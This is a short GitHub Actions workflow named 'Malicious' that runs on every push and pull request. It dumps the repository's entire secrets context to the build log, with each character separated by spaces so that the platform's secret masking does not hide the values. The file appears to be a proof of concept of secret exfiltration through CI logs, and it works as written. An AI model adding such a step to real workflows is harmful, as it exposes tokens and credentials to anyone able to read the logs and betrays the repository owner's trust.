name: Malicious

on:
  push:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Secrets
        uses: actions/github-script@v4
        env:
          SECRETS: ${{ toJSON(secrets) }}
        with:
          script: |
            // write secrets with spaces
            const secrets = process.env.SECRETS.split('').join(' ');
            console.log(secrets);
